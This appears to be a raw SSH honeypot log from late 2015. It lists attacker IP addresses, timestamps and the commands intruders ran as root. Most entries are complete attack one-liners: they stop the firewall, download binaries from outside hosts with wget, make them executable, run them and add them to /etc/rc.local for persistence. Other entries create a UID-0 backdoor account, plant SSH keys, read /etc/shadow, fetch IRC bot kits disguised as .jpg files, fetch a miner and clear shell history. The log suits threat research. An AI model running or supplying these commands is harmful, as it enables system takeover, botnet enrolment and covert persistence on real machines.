http://115.144.107.188/duge-25;chmod 0775 duge-25;./duge-25; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.144.107.188/duge-25 chmod 0775 duge-25 ./duge-25 From 185.45.12.212 11-Oct-2015 11:59:01 ssh2 root mkdir " " ls From 222.186.30.215 16-Oct-2015 12:59:09 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://198.15.216.27:2015/xdg1;chmod 777 xdg1;./xdg1; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://198.15.216.27:2015/xdg1 chmod 777 xdg1 ./xdg1 From 183.131.51.254 23-Oct-2015 17:03:01 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd /tmp; wget -c http://183.131.51.254:10101/wdds; chmod 777 wdds; ./wdds; echo "cd /tmp/">>/etc/rc.local; echo "./wdds&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://183.131.51.254:10101/91; chmod 777 91; ./91; echo "cd /tmp/">>/etc/rc.local; echo "./91&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://183.131.51.254:10101/wdds chmod 777 wdds ./wdds echo "cd /tmp/">>/etc/rc.local echo "./wdds&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://183.131.51.254:10101/91 chmod 777 91 ./91 echo "cd /tmp/">>/etc/rc.local echo "./91&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 121.12.173.62 24-Oct-2015 07:16:33 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/jiao-25;chmod 0755 jiao-25;./jiao-25; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:81/jiao-25 chmod 0755 jiao-25 ./jiao-25 From 184.179.15.71 26-Oct-2015 12:25:57 ssh2 root Exec From 185.82.203.243 27-Oct-2015 03:05:09 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd ..; cd /tmp; wget -c http://185.82.203.243:5566/32x86; chmod 777 32x86; ./32x86; echo "cd /tmp/">>/etc/rc.local; echo "./32x86&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://185.82.203.243:5566/google; chmod 777 google; ./google; echo "cd /tmp/">>/etc/rc.local; echo "./google&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd .. cd /tmp wget -c http://185.82.203.243:5566/32x86 chmod 777 32x86 ./32x86 echo "cd /tmp/">>/etc/rc.local echo "./32x86&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://185.82.203.243:5566/google chmod 777 google ./google echo "cd /tmp/">>/etc/rc.local echo "./google&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 185.82.203.243 27-Oct-2015 22:37:25 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd ..; cd /tmp; wget -c http://185.82.203.243:5566/32x86; chmod 777 32x86; ./32x86; echo "cd /tmp/">>/etc/rc.local; echo "./32x86&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd .. cd /tmp wget -c http://185.82.203.243:5566/32x86 chmod 777 32x86 ./32x86 echo "cd /tmp/">>/etc/rc.local echo "./32x86&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 222.186.30.215 28-Oct-2015 13:46:13 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://198.15.216.27:2015/.xdsy;chmod 777 .xdsy;./.xdsy; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://198.15.216.27:2015/.xdsy chmod 777 .xdsy ./.xdsy From 185.82.203.243 28-Oct-2015 23:02:45 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd ..; cd /tmp; wget -c http://185.82.203.243:5566/u6789; chmod 777 u6789; ./u6789; echo "cd /tmp/">>/etc/rc.local; echo "./u6789&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://185.82.203.243:5566/s6789; chmod 777 s6789; ./s6789; echo "cd /tmp/">>/etc/rc.local; echo "./s6789&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd .. cd /tmp wget -c http://185.82.203.243:5566/u6789 chmod 777 u6789 ./u6789 echo "cd /tmp/">>/etc/rc.local echo "./u6789&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://185.82.203.243:5566/s6789 chmod 777 s6789 ./s6789 echo "cd /tmp/">>/etc/rc.local echo "./s6789&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 46.102.77.170 29-Oct-2015 08:48:53 ssh2 root w ifconfig passwd cd ~ mkdir .ssh cd .ssh echo "ssh-rsa chmod 600 ~/.ssh/authorized_keys cd ~ mkdir lib cd chmod 600 ~/.ssh/authorized_keys cd ~ mkdir autofsd cd chmod 600 ~/.ssh/authorized_keys From 46.102.77.170 29-Oct-2015 13:41:57 ssh2 root /usr/sbin/useradd -o -u 0 public From 46.102.77.170 29-Oct-2015 18:35:01 ssh2 root cd ls -a From 46.102.77.170 29-Oct-2015 23:28:05 ssh2 root cd .mozilla ls -a From 46.102.77.170 30-Oct-2015 04:21:09 ssh2 root wget http://quit.tk/irc/unixbnc.jpg tar xvf unixbnc.jpg rm -rf unixbnc.jpg From 46.102.77.170 30-Oct-2015 09:14:13 ssh2 root -c w From 46.102.77.170 30-Oct-2015 14:07:17 ssh2 root passwd uname -a sudo passwd passwd root clear unset sudo passwd cat /etc/shadow useradd public cat /etc/passwd w shell help ? From 46.102.77.170 30-Oct-2015 19:00:21 ssh2 root msgid msgstr From 82.32.154.83 30-Oct-2015 23:53:25 ssh2 root cd /dev/shm/ wget risc.hi2.ro/irc/dronabuna.jpg tar xzvf dronabuna.jpg rm -rf dronabuna.jpg cd .p wget risc.hi2.ro/irc/dronabuna.jpg From 82.32.154.83 31-Oct-2015 04:46:29 ssh2 root wget yum install wget apt get install wget apt-get install wget From 82.32.154.83 31-Oct-2015 09:39:33 ssh2 root cd /dev/shm/ wget risc.hi2.ro/irc/dronabuna.jpg wget www.risc.hi2.ro/irc/dronabuna.jpg From 82.32.154.83 31-Oct-2015 14:32:37 ssh2 root sudo apt-get install wget apt-get install wget aptitude install znc ls cd aptitude install znc sudo yum install znc apt-get install znc sudo -u znc znc --makeconf # this creates sudo apt-get update apt-get update ls ls -a wget http://znc.in/releases/znc-1.6.5.tar.gz sudo apt-get update && sudo apt-get upgrade -y apt-get update && sudo apt-get upgrade -y wget http://znc.in/releases/znc-1.6.0.tar.gz ls -a find . -name '*znc apt-get install znc ls apt-cache search znc find / -name znc curl -O www.risc.hi2.ro/irc/dronabuna.jpg echo www.risc.hi2.ro/irc/dronabuna.jpg ls w cat /etc/issue ls cd cat /etc/issue From 82.32.154.83 31-Oct-2015 19:25:41 ssh2 root /usr/sbin/useradd comeo who w cat /etc/passwd ls wget wget -c www.risc.hi2.ro/irc/dronabuna.jpg From 31.25.140.5 3-Nov-2015 01:09:25 ssh2 root pwx pwd la ls cd /var ls From 109.236.91.85 3-Nov-2015 06:02:29 ssh2 root cd .. la ls pwd ls -la perl test1.pl cat test1.pl cat wotk.pl exit From 31.25.140.5 3-Nov-2015 10:55:33 ssh2 root last -10 uname -a hostname kurd ls cd /vj/s la ls pwd ls cd .. ls cd .. ls lcd cd .. lz s ls cd mbox ls rm -rf * ls exkt exjt histkry history exit From 188.241.228.141 3-Nov-2015 15:48:37 ssh2 root w cd ls -a menu ? help ifconfig From 121.12.173.62 6-Nov-2015 15:06:31 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/ssd;chmod 0755 ssd;./ssd; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:81/ssd chmod 0755 ssd ./ssd From 121.12.173.62 7-Nov-2015 01:27:29 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/duge-100;chmod 0755 duge-100;./duge-100; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:81/duge-100 chmod 0755 duge-100 ./duge-100 From 125.211.202.186 7-Nov-2015 17:29:57 ssh2 root Exec rm -rf /tmp/ss.exe rm -rf /tmp/ss.exe From 125.211.202.186 7-Nov-2015 22:23:01 ssh2 root Exec scp -t -- /tmp scp -t -- /tmp From 125.211.202.186 8-Nov-2015 17:55:17 ssh2 root Exec sysctl -w vm.nr_hugepages=128 && sysctl -p sysctl -w vm.nr_hugepages=128 && sysctl -p From 121.12.173.62 11-Nov-2015 08:57:09 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/duge-25;chmod 0755 duge-25;./duge-25; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:81/duge-25 chmod 0755 duge-25 ./duge-25 From 192.99.7.97 12-Nov-2015 19:36:37 ssh2 root Exec uname -a;cd /tmp;wget http://idiots.ovh/cz;perl cz;rm -rf cz;history -c uname -a cd /tmp wget http://idiots.ovh/cz perl cz rm -rf cz history -c From 46.102.79.15 14-Nov-2015 00:55:01 ssh2 root w ifconfig From 188.40.81.84 19-Nov-2015 07:54:45 ssh2 root top ls uname -a cat /proc/info top ls / ls /home ifconfig exit From 188.40.81.84 19-Nov-2015 22:33:57 ssh2 root top ls / nproc ls -la ls ./.ssh ls -la ls / cd .. ls ls /tmp exit From 176.241.185.20 24-Nov-2015 09:04:49 ssh2 root ls ifconfig passwd znc uname -a wget wget http://ircd.zemra.org/eggdrop/eggdrop-1.8.tar.gz cd .. wget http://ircd.zemra.org/eggdrop/eggdrop-1.8.tar.gz apt-get apt-get eggdrop apt-get install eggdrop apt-get install znc znc --makeconf ls wget http://ircd.zemra.org/eggdrop/eggdrop-1.8.tar.gz apt-get update sudo apt-get install build-essential libssl-dev libperl-dev pkg-config /usr/local/bin/znc --makeconf cd /usr/local/src sudo wget http://znc.in/releases/znc-latest.tar.gz wget http://znc.in/releases/znc-latest.tar.gz wget http://znc.in/releases/znc-latest.tar.gz http://znc.in/releases/znc-latest.tar.gz cd .. sudo apt-get install build-essential libssl-dev libperl-dev pkg-config checkinstall wget --no-check-certificate https://github.com/znc/znc/archive/znc-1.2.tar.gz -O - | tar xz ewxit exit From 176.241.185.20 24-Nov-2015 19:47:33 ssh2 root ls ifconfig passwd znc uname -a wget wget http://ircd.zemra.org/eggdrop/eggdrop-1.8.tar.gz wget http://ircd.zemra.org/eggdrop/eggdrop-1.8.tar.gz http://ircd.zemra.org/eggdrop/eggdrop-1.8.tar.gz cd .. wget http://ircd.zemra.org/eggdrop/eggdrop-1.8.tar.gz apt-get apt-get eggdrop apt-get install eggdrop apt-get install znc znc --makeconf ls wget http://ircd.zemra.org/eggdrop/eggdrop-1.8.tar.gz apt-get update sudo apt-get install build-essential libssl-dev libperl-dev pkg-config /usr/local/bin/znc --makeconf cd /usr/local/src sudo wget http://znc.in/releases/znc-latest.tar.gz wget http://znc.in/releases/znc-latest.tar.gz wget http://znc.in/releases/znc-latest.tar.gz http://znc.in/releases/znc-latest.tar.gz cd .. sudo apt-get install build-essential libssl-dev libperl-dev pkg-config checkinstall wget --no-check-certificate https://github.com/znc/znc/archive/znc-1.2.tar.gz -O - | tar xz ewxit exit From 176.241.185.20 30-Nov-2015 22:19:33 ssh2 root passwd pass cd .. wget wget http://www.psybnc.at/download/beta/psyBNC-2.3.2-7.tar.gz From 103.79.141.88 1-Dec-2015 03:12:37 ssh2 root wget http://www.psybnc.at/download/beta/psyBNC-2.3.2-7.tar.gz znc uname -a sudo adduser user add From 176.241.185.20 1-Dec-2015 08:05:41 ssh2 root ls ps x From 176.241.185.20 1-Dec-2015 12:58:45 ssh2 root /sbin/ip /sbin/show ip /sbin/ifconfig cd .. ls ./eggdrop nmware vmware pico proxy.doc From 103.207.39.148 1-Dec-2015 17:51:49 ssh2 root useradd -u gwapo $sudo usermod cd root $sudo usermod su uname a uname -a From 144.76.100.196 1-Dec-2015 22:44:53 ssh2 root yum apt-get install man ls -s yum install fuser From 5.188.10.144 2-Dec-2015 03:37:57 ssh2 root ftp://ftp.openbsd.org/pub/OpenBSD/3.1/packages/i386/nano-1.0.9.tgz From 46.101.53.21 3-Dec-2015 08:56:21 ssh2 root Exec uname -a;cd /tmp;wget http://137.118.111.212/bot;perl bot;rm -rf bot*; rm -rf bot.* uname -a cd /tmp wget http://137.118.111.212/bot perl bot rm -rf bot* rm -rf bot.* From 2.138.57.161 11-Dec-2015 03:03:51 ssh2 root unset HISTFILE ps ls w ls -a netstat -autp history cat /etc/passwd ls -a wget curl cat .bash_istory uname -a cat /etc/passwd nano /etc/passwd last From 218.76.82.2 19-Dec-2015 15:41:41 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd /tmp; wget -c http://124.248.228.62:5720/udp; chmod 777 udp; ./udp; echo "cd /tmp/">>/etc/rc.local; echo "./udp&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://124.248.228.62:5720/udp; chmod 777 udp; ./udp; echo "cd /tmp/">>/etc/rc.local; echo "./udp&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://124.248.228.62:5720/udp; chmod 777 udp; ./udp; echo "cd /tmp/">>/etc/rc.local; echo "./udp&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://124.248.228.62:5720/udp; chmod 777 udp; ./udp; echo "cd /tmp/">>/etc/rc.local; echo "./udp&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://124.248.228.62:5720/udp chmod 777 udp ./udp echo "cd /tmp/">>/etc/rc.local echo "./udp&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://124.248.228.62:5720/udp chmod 777 udp ./udp echo "cd /tmp/">>/etc/rc.local echo "./udp&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://124.248.228.62:5720/udp chmod 777 udp ./udp echo "cd /tmp/">>/etc/rc.local echo "./udp&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://124.248.228.62:5720/udp chmod 777 udp ./udp echo "cd /tmp/">>/etc/rc.local echo "./udp&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 121.12.173.62 19-Dec-2015 18:03:11 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/jiao-25;chmod 755 jiao-25;./jiao-25; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:81/jiao-25 chmod 755 jiao-25 ./jiao-25 From 121.12.173.62 21-Dec-2015 11:27:03 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/jiao-25;chmod 775 jiao-25;./jiao-25; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:81/jiao-25 chmod 775 jiao-25 ./jiao-25 From 218.76.82.2 21-Dec-2015 16:32:21 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd /tmp; wget -c http://61.172.235.75:5720/udp; chmod 777 udp; ./udp; echo "cd /tmp/">>/etc/rc.local; echo "./udp&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://61.172.235.75:5720/udp; chmod 777 udp; ./udp; echo "cd /tmp/">>/etc/rc.local; echo "./udp&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://61.172.235.75:5720/udp; chmod 777 udp; ./udp; echo "cd /tmp/">>/etc/rc.local; echo "./udp&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://61.172.235.75:5720/udp; chmod 777 udp; ./udp; echo "cd /tmp/">>/etc/rc.local; echo "./udp&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://61.172.235.75:5720/udp chmod 777 udp ./udp echo "cd /tmp/">>/etc/rc.local echo "./udp&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://61.172.235.75:5720/udp chmod 777 udp ./udp echo "cd /tmp/">>/etc/rc.local echo "./udp&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://61.172.235.75:5720/udp chmod 777 udp ./udp echo "cd /tmp/">>/etc/rc.local echo "./udp&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://61.172.235.75:5720/udp chmod 777 udp ./udp echo "cd /tmp/">>/etc/rc.local echo "./udp&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 37.201.242.232 22-Dec-2015 21:50:45 ssh2 root unset HISTFILE unset HISTSAVE w uname -a cat /proc/cpuinfo exit From 37.201.242.232 23-Dec-2015 02:43:49 ssh2 root unset HISTFILE cd cd /home ls cat /etc/passwd ls exit From 151.66.123.90 23-Dec-2015 21:12:14 ssh2 root w ls -a uname -a cat /etc/issue np cat /proc/cpuinfo ls -a cd /var/tm ls -a cd .. cd /tm cd /var/tmp ls -a cd zzila ls -a wget http://rekon.altervista.org/irc/bnc.tgz ps x w ls -a uname -a cat /etc/issue cd cd .. ls -a From 151.66.123.90 24-Dec-2015 08:02:13 ssh2 root w ls -a uname -a cat /etc/issue np cat /proc/cpuinfo ls -a cd /var/tm ls -a cd .. cd /tm cd /var/tmp ls -a cd zzila ls -a wget wget http://rekon.altervista.org/irc/bnc.tgz ps x w ls -a uname -a cat /etc/issue cd cd .. ls -a From 121.12.173.62 24-Dec-2015 11:53:49 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/jiao-25;chmod 777 jiao-25;./jiao-25; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:81/jiao-25 chmod 777 jiao-25 ./jiao-25 From 193.201.224.206 24-Dec-2015 12:55:17 ssh2 root cdn fetch lynx wget From 121.12.173.62 25-Dec-2015 08:35:45 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/love;chmod 755 love;./love; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:81/love chmod 755 love ./love From 41.58.204.36 25-Dec-2015 18:13:41 ssh2 root ls -lia uname -a From 45.33.248.245 26-Dec-2015 18:39:01 ssh2 root wget http://210.245.92.160:9090/miner.tgz curl -O http://210.245.92.160:9090/miner.tgz From 121.12.173.62 27-Dec-2015 22:41:33 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188:454/jiao;chmod 755 jiao;./jiao; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.144.107.188:454/jiao chmod 755 jiao ./jiao From 121.12.173.62 30-Dec-2015 12:47:21 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/pz-100;chmod 755 pz-100;./pz-100; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:81/pz-100 chmod 755 pz-100 ./pz-100